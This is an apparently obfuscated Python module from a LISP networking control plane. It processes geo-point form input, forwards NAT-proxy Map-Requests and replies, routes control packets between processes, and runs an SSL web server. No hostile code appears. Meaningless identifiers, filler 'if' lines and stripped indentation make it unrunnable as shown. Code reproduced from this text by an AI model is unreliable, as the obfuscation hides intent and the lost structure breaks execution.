oo0OoOO0o0o = bottle . request . forms . get ( "geo-point" )
III1I1Iii11i = bottle . request . forms . get ( "geo-prefix" )
i1I1ii = ""
if 96 - 96: oO0o - oO0o
if 87 - 87: Oo0Ooo / OoooooooOO - I1ii11iIi11i . IiII + iIii1I11I1II1 . I1ii11iIi11i
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
o0OO0oooo = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
I11II1i1 = lisp . lisp_geo ( "" )
IiI1ii11I1 = lisp . lisp_geo ( "" )
I1i1iI , I1iI1I1ii1 = oOOOOO0Ooooo ( oo0OoOO0o0o , III1I1Iii11i )
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if ( o0OO0oooo . is_geo_string ( oo0OoOO0o0o ) ) :
if ( I11II1i1 . parse_geo_string ( oo0OoOO0o0o ) == False ) :
i1I1ii = "Could not parse geo-point format"
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
elif ( I1i1iI == None ) :
i1I1ii = "EID {} lookup could not find geo-point" . format (
lisp . bold ( oo0OoOO0o0o , True ) )
elif ( I11II1i1 . parse_geo_string ( I1i1iI ) == False ) :
i1I1ii = "Could not parse geo-point format returned from lookup"
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if ( i1I1ii == "" ) :
if ( o0OO0oooo . is_geo_string ( III1I1Iii11i ) ) :
if ( IiI1ii11I1 . parse_geo_string ( III1I1Iii11i ) == False ) :
i1I1ii = "Could not parse geo-prefix format"
if 46 - 46: iII111i
elif ( I1iI1I1ii1 == None ) :
i1I1ii = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( III1I1Iii11i , True ) )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
elif ( IiI1ii11I1 . parse_geo_string ( I1iI1I1ii1 ) == False ) :
i1I1ii = "Could not parse geo-prefix format returned from lookup"
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if ( i1I1ii == "" ) :
oo0OoOO0o0o = "" if ( oo0OoOO0o0o == I1i1iI ) else ", EID {}" . format ( oo0OoOO0o0o )
III1I1Iii11i = "" if ( III1I1Iii11i == I1iI1I1ii1 ) else ", EID-prefix {}" . format ( III1I1Iii11i )
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
iiII = I11II1i1 . print_geo_url ( )
I1iI1111i = IiI1ii11I1 . print_geo_url ( )
I1Ii1iIIIIi = IiI1ii11I1 . radius
iii = I11II1i1 . dms_to_decimal ( )
iii = ( round ( iii [ 0 ] , 6 ) , round ( iii [ 1 ] , 6 ) )
O000OOO = IiI1ii11I1 . dms_to_decimal ( )
O000OOO = ( round ( O000OOO [ 0 ] , 6 ) , round ( O000OOO [ 1 ] , 6 ) )
o0 = round ( IiI1ii11I1 . get_distance ( I11II1i1 ) , 2 )
IIi1 = "inside" if IiI1ii11I1 . point_in_circle ( I11II1i1 ) else "outside"
if 73 - 73: OOooOOo + OOooOOo % I11i * i1IIi
if 4 - 4: OOooOOo - oO0o % OoOoOO00 / II111iiii % oO0o
O0OO0OoO = lisp . space ( 2 )
o0OOo = lisp . space ( 1 )
IiI1Ii11Ii = lisp . space ( 3 )
if 99 - 99: O0 . o0oOOo0O0Ooo % I11i - Oo0Ooo / I11i
i1I1ii = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( O0OO0OoO , iiII , iii , oo0OoOO0o0o ,
# I1Ii111 / OoOoOO00
o0OOo , I1iI1111i , O000OOO , I1Ii1iIIIIi , III1I1Iii11i )
i1I1ii += "Distance:{}{} kilometers, point is {} of circle" . format ( IiI1Ii11Ii ,
o0 , lisp . bold ( IIi1 , True ) )
if 82 - 82: OoooooooOO . Ii1I
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
def iiIIIIiI111 ( addr_str , port , nonce ) :
if ( addr_str != None ) :
for OoooOO0Oo0 in lisp . lisp_info_sources_by_address . values ( ) :
I1iIiIii = OoooOO0Oo0 . address . print_address_no_iid ( )
if ( I1iIiIii == addr_str and OoooOO0Oo0 . port == port ) :
return ( OoooOO0Oo0 )
if 76 - 76: OoO0O00 . OoooooooOO % I1Ii111 * Ii1I
if 23 - 23: IiII + iIii1I11I1II1
return ( None )
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if ( nonce != None ) :
if ( nonce not in lisp . lisp_info_sources_by_nonce ) : return ( None )
return ( lisp . lisp_info_sources_by_nonce [ nonce ] )
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
return ( None )
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
def oo0oO00o0O00o ( lisp_sockets , info_source , packet ) :
if 98 - 98: ooOoO0o . OOooOOo
if 60 - 60: OoO0O00 - i1IIi . OOooOOo + OOooOOo * OOooOOo + Ii1I
if 66 - 66: OOooOOo * OOooOOo / iIii1I11I1II1 + OoOoOO00 . OOooOOo
if 51 - 51: I1ii11iIi11i
o0oOOOOoo0 = lisp . lisp_ecm ( 0 )
packet = o0oOOOOoo0 . decode ( packet )
if ( packet == None ) :
lisp . lprint ( "Could not decode ECM packet" )
return ( True )
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
I1ii1II1iII = lisp . lisp_control_header ( )
if ( I1ii1II1iII . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return ( True )
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if ( I1ii1II1iII . type != lisp . LISP_MAP_REQUEST ) :
lisp . lprint ( "Received ECM without Map-Request inside" )
return ( True )
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
i1IiiI = lisp . lisp_map_request ( )
packet = i1IiiI . decode ( packet , None , 0 )
O0OOO0 = i1IiiI . nonce
o0OIi = info_source . address . print_address_no_iid ( )
if 11 - 11: oO0o . I1IiiI + IiII / i1IIi
if 1 - 1: Oo0Ooo * I1Ii111 . OoooooooOO
if 73 - 73: OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: oO0o - OoooooooOO * Oo0Ooo * I11i + o0oOOo0O0Ooo * I1ii11iIi11i
i1IiiI . print_map_request ( )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
# O0 % ooOoO0o % I11i
lisp . red ( o0OIi , False ) , info_source . port ,
lisp . lisp_hex_string ( O0OOO0 ) ) )
if 25 - 25: OoooooooOO % Ii1I * II111iiii - OoO0O00
if 95 - 95: I1IiiI % I1Ii111 * I1IiiI + O0 . I1Ii111 % OoooooooOO
if 6 - 6: OoOoOO00 - ooOoO0o * o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo
if 100 - 100: OoO0O00 % I1Ii111 - I11i % I11i % I11i / ooOoO0o
if 83 - 83: oO0o - ooOoO0o - IiII % i1IIi - iII111i . o0oOOo0O0Ooo
info_source . cache_nonce_for_info_source ( O0OOO0 )
if 96 - 96: Oo0Ooo + I1Ii111 . i1IIi
if 54 - 54: II111iiii . i1IIi / I1ii11iIi11i % I1IiiI / I1Ii111
if 65 - 65: OoOoOO00 . OoOoOO00 - oO0o + Oo0Ooo / i11iIiiIii
if 90 - 90: iIii1I11I1II1 + OoOoOO00
if 9 - 9: iIii1I11I1II1 . OoooooooOO + i1IIi - Oo0Ooo
info_source . no_timeout = i1IiiI . subscribe_bit
if 30 - 30: iII111i / OoO0O00 . iII111i
if 17 - 17: Oo0Ooo + OoooooooOO * OoooooooOO
if 5 - 5: I1Ii111 % OoooooooOO . OoOoOO00
if 67 - 67: I1ii11iIi11i + Ii1I
if 72 - 72: IiII % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . o0oOOo0O0Ooo . i1IIi % I1IiiI % ooOoO0o
for oO0oo in i1IiiI . itr_rlocs :
if ( oO0oo . is_local ( ) ) : return ( False )
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
iiII1i = lisp . lisp_myrlocs [ 0 ]
i1IiiI . itr_rloc_count = 0
i1IiiI . itr_rlocs = [ ]
i1IiiI . itr_rlocs . append ( iiII1i )
if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
packet = i1IiiI . encode ( None , 0 )
i1IiiI . print_map_request ( )
if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
O00o = i1IiiI . target_eid
if ( O00o . is_ipv6 ( ) ) :
o0o0ooOo00 = lisp . lisp_myrlocs [ 1 ]
if ( o0o0ooOo00 != None ) : iiII1i = o0o0ooOo00
if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
if 13 - 13: I1ii11iIi11i
if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
if 41 - 41: OoooooooOO / i1IIi
if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
i1i1Ii1IiIII = lisp . lisp_is_running ( "lisp-ms" )
lisp . lisp_send_ecm ( lisp_sockets , packet , O00o , lisp . LISP_CTRL_PORT ,
O00o , iiII1i , to_ms = i1i1Ii1IiIII , ddt = False )
return ( True )
if 9 - 9: I11i - oO0o + O0 / iII111i % i1IIi
if 97 - 97: o0oOOo0O0Ooo * ooOoO0o
if 78 - 78: I11i . OOooOOo + oO0o * iII111i - i1IIi
if 27 - 27: Ii1I % i1IIi . Oo0Ooo % I1Ii111
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
def oO0oOOOooo ( lisp_sockets , info_source , packet , mr_or_mn ) :
o0OIi = info_source . address . print_address_no_iid ( )
oOoO0o00OO0 = info_source . port
O0OOO0 = info_source . nonce
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo / iIii1I11I1II1 * I1Ii111
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp . bold ( "nat-proxy Map-{}" . format ( mr_or_mn ) , False )
if 3 - 3: OOooOOo . IiII / Oo0Ooo
lisp . lprint ( "Forward {} to info-source {}, port {}, nonce 0x{}" . format ( mr_or_mn , lisp . red ( o0OIi , False ) , oOoO0o00OO0 ,
# iIii1I11I1II1 % iIii1I11I1II1 / ooOoO0o . oO0o + I1Ii111 . I1Ii111
lisp . lisp_hex_string ( O0OOO0 ) ) )
if 90 - 90: o0oOOo0O0Ooo / OOooOOo - OOooOOo . I1IiiI
if 82 - 82: I1Ii111 . I1Ii111 - iII111i
if 72 - 72: i11iIiiIii
if 94 - 94: OOooOOo
i1IiI1ii1i = lisp . lisp_convert_4to6 ( o0OIi )
lisp . lisp_send ( lisp_sockets , i1IiI1ii1i , oOoO0o00OO0 , packet )
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
def oooO0o ( lisp_sockets , source , sport , packet ) :
global Oo
if 19 - 19: OOooOOo % OoO0O00 / Ii1I + II111iiii % OoooooooOO
I1ii1II1iII = lisp . lisp_control_header ( )
if ( I1ii1II1iII . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return
if 89 - 89: Ii1I
if 51 - 51: iII111i
if 68 - 68: iII111i - o0oOOo0O0Ooo * OoO0O00 % ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if 32 - 32: OoooooooOO % oO0o % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - Ii1I - I1ii11iIi11i / i11iIiiIii - II111iiii
if 98 - 98: Ii1I - I1IiiI . i11iIiiIii * Oo0Ooo
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if ( I1ii1II1iII . type == lisp . LISP_NAT_INFO ) :
if ( I1ii1II1iII . info_reply == False ) :
lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
lisp . lisp_ms_rtr_list )
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
return
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
oo0O00ooo0o = packet
packet = lisp . lisp_packet_ipc ( packet , source , sport )
if 29 - 29: OoooooooOO . II111iiii % OoOoOO00
if 26 - 26: iIii1I11I1II1 - I1ii11iIi11i . IiII . IiII + iIii1I11I1II1 * Oo0Ooo
if 85 - 85: OOooOOo + II111iiii - OOooOOo * oO0o - i1IIi % iII111i
if 1 - 1: OoooooooOO / O0 + OoOoOO00 + OoOoOO00 . I1Ii111 - OoOoOO00
if ( I1ii1II1iII . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
lisp . lisp_ipc ( packet , Oo , "lisp-ms" )
return
if 9 - 9: I1Ii111 * OoooooooOO % I1IiiI / OoOoOO00 * I11i
if 48 - 48: OoooooooOO . OoOoOO00
if 65 - 65: oO0o . Oo0Ooo
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if 69 - 69: O0 - O0
if ( I1ii1II1iII . type == lisp . LISP_MAP_REPLY ) :
i1I1i1i1I1 = lisp . lisp_map_reply ( )
i1I1i1i1I1 . decode ( oo0O00ooo0o )
if 17 - 17: OoOoOO00 + OoooooooOO % OOooOOo
OoooOO0Oo0 = iiIIIIiI111 ( None , 0 , i1I1i1i1I1 . nonce )
if ( OoooOO0Oo0 ) :
oO0oOOOooo ( lisp_sockets , OoooOO0Oo0 , oo0O00ooo0o , True )
else :
O0OoO0o = "/tmp/lisp-lig"
if ( os . path . exists ( O0OoO0o ) ) :
lisp . lisp_ipc ( packet , Oo , O0OoO0o )
else :
lisp . lisp_ipc ( packet , Oo , "lisp-itr" )
if 36 - 36: i11iIiiIii + I1ii11iIi11i % OOooOOo . I1IiiI - ooOoO0o
if 94 - 94: I1IiiI % OoOoOO00 . IiII . ooOoO0o . OoO0O00
return
if 53 - 53: OoOoOO00
if 84 - 84: OoO0O00
if 97 - 97: i1IIi
if 98 - 98: OoooooooOO - I1IiiI + ooOoO0o
if 98 - 98: iII111i . IiII . IiII - OOooOOo
if ( I1ii1II1iII . type == lisp . LISP_MAP_NOTIFY ) :
oOOO0o = lisp . lisp_map_notify ( lisp_sockets )
oOOO0o . decode ( oo0O00ooo0o )
if 18 - 18: I1ii11iIi11i / Oo0Ooo - iII111i
OoooOO0Oo0 = iiIIIIiI111 ( None , 0 , oOOO0o . nonce )
if ( OoooOO0Oo0 ) :
oO0oOOOooo ( lisp_sockets , OoooOO0Oo0 , oo0O00ooo0o ,
False )
else :
O0OoO0o = "/tmp/lisp-lig"
if ( os . path . exists ( O0OoO0o ) ) :
lisp . lisp_ipc ( packet , Oo , O0OoO0o )
else :
OOoO00ooO = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
if 69 - 69: oO0o / IiII * ooOoO0o
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
if 81 - 81: oO0o
if 62 - 62: Ii1I + O0 * OoO0O00
return
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if ( I1ii1II1iII . type == lisp . LISP_MAP_REFERRAL ) :
II1io0 = "/tmp/lisp-rig"
if ( os . path . exists ( II1io0 ) ) :
lisp . lisp_ipc ( packet , Oo , II1io0 )
else :
lisp . lisp_ipc ( packet , Oo , "lisp-mr" )
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
return
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
if ( I1ii1II1iII . type == lisp . LISP_MAP_REQUEST ) :
OOoO00ooO = "lisp-itr" if ( I1ii1II1iII . is_smr ( ) ) else "lisp-etr"
if 11 - 11: O0 * OoOoOO00
if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
if 18 - 18: OoooooooOO
if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
if ( I1ii1II1iII . rloc_probe ) : return
if 94 - 94: ooOoO0o + I1IiiI
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
return
if 56 - 56: OoOoOO00 % o0oOOo0O0Ooo
if 40 - 40: OOooOOo / IiII
if 29 - 29: Ii1I - Ii1I / ooOoO0o
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if ( I1ii1II1iII . type == lisp . LISP_ECM ) :
OoooOO0Oo0 = iiIIIIiI111 ( source , sport , None )
if ( OoooOO0Oo0 ) :
if ( oo0oO00o0O00o ( lisp_sockets , OoooOO0Oo0 ,
oo0O00ooo0o ) ) : return
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
OOoO00ooO = "lisp-mr"
if ( I1ii1II1iII . is_to_etr ( ) ) :
OOoO00ooO = "lisp-etr"
elif ( I1ii1II1iII . is_to_ms ( ) ) :
OOoO00ooO = "lisp-ms"
elif ( I1ii1II1iII . is_ddt ( ) ) :
if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
OOoO00ooO = "lisp-ddt"
elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
OOoO00ooO = "lisp-ms"
if 33 - 33: II111iiii - IiII - ooOoO0o
elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
OOoO00ooO = "lisp-etr"
if 92 - 92: OoO0O00 * IiII
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
if 92 - 92: oO0o
return
if 7 - 7: iII111i
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
class O0oooo0O ( bottle . ServerAdapter ) :
def run ( self , hand ) :
Ii1iiIIi1i = "./lisp-cert.pem"
if 44 - 44: o0oOOo0O0Ooo
if 51 - 51: II111iiii
if 10 - 10: OoO0O00 % OoO0O00 / o0oOOo0O0Ooo - OoOoOO00
if 44 - 44: ooOoO0o - O0 / II111iiii . iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if ( os . path . exists ( Ii1iiIIi1i ) == False ) :
os . system ( "cp ./lisp-cert.pem.default {}" . format ( Ii1iiIIi1i ) )
lisp . lprint ( ( "{} does not exist, creating a copy from lisp-" + "cert.pem.default" ) . format ( Ii1iiIIi1i ) )
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
Oooo = wsgiserver . CherryPyWSGIServer ( ( self . host , self . port ) , hand )
Oooo . ssl_adapter = pyOpenSSLAdapter ( Ii1iiIIi1i , Ii1iiIIi1i , None )
if 74 - 74: ooOoO0o % OoOoOO00 / Oo0Ooo
if 2 - 2: IiII % IiII % I1Ii111
try :
Oooo . start ( )
finally :
Oooo . stop ( )
if 60 - 60: OOooOOo
if 73 - 73: ooOoO0o
if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
if 48 - 48: oO0o % ooOoO0o + O0
if 27 - 27: I1ii11iIi11i / OOooOOo
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
def oOooOoOOo0O ( bottle_port ) :
lisp . lisp_set_exception ( )
if 41 - 41: iII111i
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
if 31 - 31: i11iIiiIii * OoOoOO00
if ( bottle_port < 0 ) :
bottle . run ( host = "0.0.0.0" , port = - bottle_port )
return
if 69 - 69: i11iIiiIii
if 61 - 61: O0
bottle . server_names [ "lisp-ssl-server" ] = O0oooo0O
if 21 - 21: OoO0O00 % iIii1I11I1II1 . OoO0O00
if 99 - 99: o0oOOo0O0Ooo * OOooOOo % oO0o * oO0o + OoooooooOO
if 82 - 82: I11i / OoOoOO00 - OOooOOo / ooOoO0o
if 50 - 50: OOooOOo + OoO0O00 . i11iIiiIii + I1ii11iIi11i + i11iIiiIii
try :
bottle . run ( host = "0.0.0.0" , port = bottle_port , server = "lisp-ssl-server" ,
fast = True )
except :
bottle . run ( host = "0.0.0.0" , port = bottle_port , fast = True )
if 31 - 31: oO0o * I1Ii111 . OoOoOO00 * I11i
return
if 28 - 28: IiII + I1IiiI - Oo0Ooo % OOooOOo . I11i + I1IiiI
if 72 - 72: Ii1I / Oo0Ooo / oO0o * OoOoOO00 + OOooOOo
if 58 - 58: o0oOOo0O0Ooo % I1IiiI . I1IiiI * OoO0O00 - IiII . OoooooooOO
if 10 - 10: I1Ii111
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
def o00OIIIIIiiI ( ) :
lisp . lisp_set_exception ( )
if 38 - 38: O0
return
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if 28 - 28: i11iIiiIii
if 51 - 51: I1IiiI + ooOoO0o * O0 . Ii1I
def O00Oo00OOoO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
IIiiI = { "lisp-itr" : False , "lisp-etr" : False , "lisp-rtr" : False ,
"lisp-mr" : False , "lisp-ms" : False , "lisp-ddt" : False }
if 99 - 99: OoO0O00 / i1IIi . I1ii11iIi11i
while ( True ) :
time . sleep ( 1 )
I1I1i11iiiiI = IIiiI
IIiiI = { }
if 66 - 66: oO0o / OoOoOO00
for OOoO00ooO in I1I1i11iiiiI :
IIiiI [ OOoO00ooO ] = lisp . lisp_is_running ( OOoO00ooO )
if ( I1I1i11iiiiI [ OOoO00ooO ] == IIiiI [ OOoO00ooO ] ) : continue
if 13 - 13: II111iiii
lisp . lprint ( "*** Process '{}' has {} ***" . format ( OOoO00ooO ,
"come up" if IIiiI [ OOoO00ooO ] else "gone down" ) )
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
if ( IIiiI [ OOoO00ooO ] == True ) :
lisp . lisp_ipc_lock . acquire ( )
lispconfig . lisp_send_commands ( lisp_socket , OOoO00ooO )
lisp . lisp_ipc_lock . release ( )
if 50 - 50: II111iiii
if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
if 44 - 44: I1IiiI
return
if 55 - 55: oO0o . I1Ii111 * I1Ii111
if 82 - 82: I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
